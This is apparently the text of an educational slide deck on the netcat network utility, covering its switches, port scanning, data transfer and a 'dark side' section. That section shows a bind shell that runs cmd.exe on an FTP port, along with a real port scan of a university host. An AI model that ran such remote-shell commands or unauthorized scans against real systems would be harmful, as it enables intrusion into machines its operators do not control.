netcat

Purpose of Presentation…?

Analyze the network Identify the network security issues

How to do it …?

First Step Research the Network

Tools for Research

Information Gathering tools Forensic tools Network Utility tools Password Auditing tools Recovery And Restoration Tools Vulnerability Scanning & Analysis tools

What is netcat ?

Swiss Army Knife of Network A versatile network Utility tool Uses TCP and UDP protocol Designed as a backend tool

Can be used directlyDriven by other programs

Power of netcat

Can create Outbound or Inbound connections TCP or UDP to or from any ports

Full DNS forward reverse checking Can use any local port Can use any locally configured network

address Port scanning with randomizer Option to let other program service

establish connections Optional telnet responder

How Do I use netcat ?

General form of usage is nc [switches] [hostname] [portnumber]

Simplest Usage would benc –v www.msn.com 80Use GET method GET / HTTP/1.0

Hostname can be a name or IP Address

Use of –n switch If not specified performs forward and reverse

DNS look up Reports the problem of mismatched names in

DNS

D:\tools\nc>nc -v www.hotmail.com 80DNS fwd/rev mismatch: www.hotmail.com != hotmail.seDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comwww.hotmail.com [207.68.171.233] 80 (http) open

IF specified will take only IPAddress as hostname argument

Options

-vControls the verbosity level

-w <seconds>Sets the network inactivity timeout

-p <port number>Binds the connection to specific port

number

Options

-o <file name>To obtain hexdump file of data sent

either way -l

Makes netcat wait for inbound connections

And once connection is established it transfers the data

Interesting -l

Can use to create like a listening netcat server

On listening endD:\tools\nc>nc –l -p 1234 < test.txt

On client end D:\tools\nc>nc 192.168.0.100 1234

Options

-LListen harder

-rRandomize port numbers

-zZero – I/O mode [used in scanning]

Options

-e <program name>Allows to execute a program

(dangerous) -d

Allows to run in detached mode without console window

-uMakes a UDP connection instead of

TCP connection

Options

-s <address>Local source address

-i <seconds>Specifies delay interval for lines sent

or ports scanned -t

Answer telnet negotiation

Put the Knife to Use

Use It GOOD

Use It BAD

USE IT GOOD

Port Scanning

Find what is out there

• nc –v –w 5 –r davinci.newcs.uwindsor.ca 20-30

D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) openSSH-2.0-Sun_SSH_1.0davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) opendavinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) openinternet2 proxy-telnet [v3.1] ready

 √☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open220-Sendmail 8.6.12/8.6.12 ready on internet2220 ESMTP spoken heredavinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open220- internet2 proxy-ftp [v3.1] ready220 Please enter your userid

D:\tools\nc>

USE IT GOOD

Simple Data Transfer AgentImmaterial which side is server and

which side is clientInput at one goes as output to another

HEX Dump FeatureCan be used to analyze odd network

protocols

USE IT GOOD

Performance Testing

Generate large amount of useless data on network with server on one end and client on other end we can use it to test network performance.

Protect your workstations X server

DARK SIDE

Scanning for vulnerable servicesCan use files as input to netcat and

scan the system by using –i and –r switches

Can use –e option to execute programs

SYN-Bombing Can disable TCP servers

EXAMPLE

Listen on port 21 (FTP Port) using netcat with –e switch to execute cmd.exe

FTP request made from a different machine on the listener machine

RESULT

D:\tools\nc>nc -l -p 21 -e cmd.exeLISTENER

C:\Documents and Settings\RAJAT>ftp 192.168.0.100Connected to 192.168.0.100.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

D:\tools\nc>Request

Environment

Local Home Network

ISP --- CogecoThree PC’s OS Windows XPConnected via DLink RouterCat 5 connecting cables used

Conclusion

Netcat is a very useful network utility tool

Very light but extremely effective Particularly when it can listen and

execute programs when connection requests are made on the specific ports

Credits

Chris Wysopal

Hobbit

www.atstake.com

THANK YOU